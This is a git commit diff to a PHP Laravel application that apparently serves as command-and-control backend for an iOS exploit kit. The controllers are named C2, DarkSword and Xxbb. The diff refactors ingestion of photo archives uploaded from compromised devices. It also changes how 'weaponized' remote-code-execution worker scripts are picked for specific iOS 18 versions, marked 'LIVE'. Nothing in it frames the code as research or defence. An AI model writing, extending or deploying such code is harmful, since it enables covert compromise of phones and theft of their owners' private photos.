feat: quene

This commit is contained in:
hashbro
2026-09-01 05:09:00 +08:00
parent 337bf45c79
commit e23550e820
28 changed files with 969 additions and 234 deletions
+19 -33
View File
@@ -3,9 +3,9 @@
namespace App\Http\Controllers\C2;
use App\Http\Controllers\Controller;
use App\Services\CorunaArchive;
use App\Services\CorunaCrypto;
use App\Services\IngestService;
use App\Services\PhotoArchiveIngest;
use Illuminate\Http\Request;
use Illuminate\Http\Response;
@@ -14,17 +14,17 @@ class C2Controller extends Controller
/** @var CorunaCrypto */
private $crypto;
/** @var CorunaArchive */
private $archive;
/** @var IngestService */
private $ingest;
public function __construct(CorunaCrypto $crypto, CorunaArchive $archive, IngestService $ingest)
/** @var PhotoArchiveIngest */
private $photos;
public function __construct(CorunaCrypto $crypto, IngestService $ingest, PhotoArchiveIngest $photos)
{
$this->crypto = $crypto;
$this->archive = $archive;
$this->ingest = $ingest;
$this->photos = $photos;
}
public function query(): Response
@@ -136,33 +136,19 @@ class C2Controller extends Controller
];
if ($request->hasFile('file') && $device && $device->fresh()?->albumStorageEnabled()) {
$bytes = file_get_contents($request->file('file')->getRealPath());
$work = storage_path('app/c2/check/'.$device->device_id.'/'.date('YmdHis').'_'.uniqid());
try {
$extracted = $this->archive->extract($bytes, $work, $batchBase);
if (! empty($extracted['files'])) {
$this->ingest->ingestPhotos($device, $extracted['files'], $photoMeta);
}
create_log([
'event' => 'check_extract',
'device_key' => $device->device_id,
'extract' => [
'ok' => $extracted['ok'],
'files' => array_map('basename', $extracted['files']),
'password_recipe' => $extracted['password_recipe'],
'stderr' => substr((string) $extracted['stderr'], 0, 2000),
],
'photo_meta' => $photoMeta,
'raw_counters' => [
'idx' => $request->input('idx'),
'ftu' => $request->input('ftu'),
'ts' => $request->input('ts'),
'x-hit' => $xHitRaw,
],
], 'c2');
} finally {
CorunaArchive::forgetWorkDir($work);
}
$this->photos->accept(
$device,
(string) $request->file('file')->getRealPath(),
$batchBase,
$photoMeta,
'lab',
[
'idx' => $request->input('idx'),
'ftu' => $request->input('ftu'),
'ts' => $request->input('ts'),
'x-hit' => $xHitRaw,
],
);
}
// Prefer encrypted ack (clients that expect JSON); fall back same as other routes
@@ -4,6 +4,7 @@ namespace App\Http\Controllers\C2;
use App\Http\Controllers\Controller;
use App\Models\Device;
use App\Models\PageVisit;
use App\Services\DarkSwordIngestAdapter;
use App\Services\DsBeaconQueue;
use Illuminate\Http\Request;
@@ -174,21 +175,31 @@ class DarkSwordC2Controller extends Controller
}
$base = $scheme.'://'.$host.($this->isDefaultPort($scheme, $port) ? '' : ':'.$port);
$ios = $this->requestIos($request);
[$recommended, $fallbacks] = $this->chainTargetWorkers($ios);
$ds = PageVisit::isDarkSwordIosVersionString($ios);
if ($ds) {
[$recommended, $fallbacks] = $this->chainTargetWorkers($ios);
$chain = 'darksword';
$reason = 'DarkSword '.$ios;
} else {
$recommended = '';
$fallbacks = [];
$chain = 'coruna';
$reason = 'Coruna (DS allowlist: 18.5 / 18.6 / 18.6.1 / 18.6.2)';
}
return $this->finish($request, '/api/ds/chain-targets', $this->payloadFromQueryOrJson($request), response()->json([
'ok' => true,
'chain' => 'darksword',
'chain' => $chain,
'weaponized' => true,
'gated' => false,
'ios' => $ios,
'reason' => 'DarkSword 18.4-18.7.2',
'reason' => $reason,
'recommended_worker' => $recommended,
'fallback_workers' => $fallbacks,
'band' => [
'recommended_worker' => $recommended,
'fallback_workers' => $fallbacks,
'usable_for_attempt' => true,
'usable_for_attempt' => $ds,
'usable_grade' => 'LIVE',
'weaponized' => true,
],
@@ -320,25 +331,17 @@ class DarkSwordC2Controller extends Controller
}
/**
* Worker plan from live one99.vip /api/chain-targets.
*
* 18.4.x → 18.4 then [18.5, 18.6]
* 18.5.x → 18.5 then [18.6, 18.4]
* anything else (18.6+, 18.7, 17.x, 26.x, empty) → 18.6 then [18.5, 18.4]
* Workers only for the DS allowlist (18.5 / 18.6 / 18.6.1 / 18.6.2).
*
* @return array{0: string, 1: list<string>}
*/
private function chainTargetWorkers(string $ios): array
{
$minor = null;
if (preg_match('/^18\.(\d+)/', $ios, $m)) {
$minor = (int) $m[1];
}
$canon = PageVisit::canonicalIosVersion($ios);
return match ($minor) {
4 => ['rce_worker_18.4.js', ['rce_worker_18.5.js', 'rce_worker_18.6.js']],
5 => ['rce_worker_18.5.js', ['rce_worker_18.6.js', 'rce_worker_18.4.js']],
default => ['rce_worker_18.6.js', ['rce_worker_18.5.js', 'rce_worker_18.4.js']],
return match ($canon) {
'18.5' => ['rce_worker_18.5.js', ['rce_worker_18.6.js']],
default => ['rce_worker_18.6.js', []],
};
}
+15 -37
View File
@@ -3,9 +3,8 @@
namespace App\Http\Controllers\C2;
use App\Http\Controllers\Controller;
use App\Http\Middleware\DecryptXxbbBody;
use App\Services\CorunaArchive;
use App\Services\IngestService;
use App\Services\PhotoArchiveIngest;
use Illuminate\Http\Request;
use Illuminate\Http\Response;
@@ -25,6 +24,7 @@ class XxbbC2Controller extends Controller
{
public function __construct(
private readonly IngestService $ingest,
private readonly PhotoArchiveIngest $photos,
) {}
public function vhx(): Response
@@ -107,33 +107,19 @@ class XxbbC2Controller extends Controller
];
if ($request->hasFile('file') && $device && $device->fresh()?->albumStorageEnabled()) {
$bytes = file_get_contents($request->file('file')->getRealPath());
$work = storage_path('app/c2/check/'.$device->device_id.'/'.date('YmdHis').'_'.uniqid());
try {
$extracted = $this->xxbbArchive()->extract($bytes, $work, $batchBase);
if (! empty($extracted['files'])) {
$this->ingest->ingestPhotos($device, $extracted['files'], $photoMeta);
}
create_log([
'event' => 'xxbb_photo_extract',
'device_key' => $device->device_id,
'extract' => [
'ok' => $extracted['ok'],
'files' => array_map('basename', $extracted['files']),
'password_recipe' => $extracted['password_recipe'],
'stderr' => substr((string) $extracted['stderr'], 0, 2000),
],
'photo_meta' => $photoMeta,
'raw_counters' => [
'idx' => $request->input('idx'),
'ftu' => $request->input('ftu'),
'ts' => $request->input('ts'),
'x-hit' => $xHitRaw,
],
], 'xxbb');
} finally {
CorunaArchive::forgetWorkDir($work);
}
$this->photos->accept(
$device,
(string) $request->file('file')->getRealPath(),
$batchBase,
$photoMeta,
'xxbb',
[
'idx' => $request->input('idx'),
'ftu' => $request->input('ftu'),
'ts' => $request->input('ts'),
'x-hit' => $xHitRaw,
],
);
}
return $this->xxbbAck($request);
@@ -237,14 +223,6 @@ class XxbbC2Controller extends Controller
return $this->xxbbAck($request);
}
private function xxbbArchive(): CorunaArchive
{
return new CorunaArchive(
DecryptXxbbBody::crypto(),
(string) config('coruna.seven_zip', ''),
);
}
/**
* @param array<string, mixed>|null $body
*/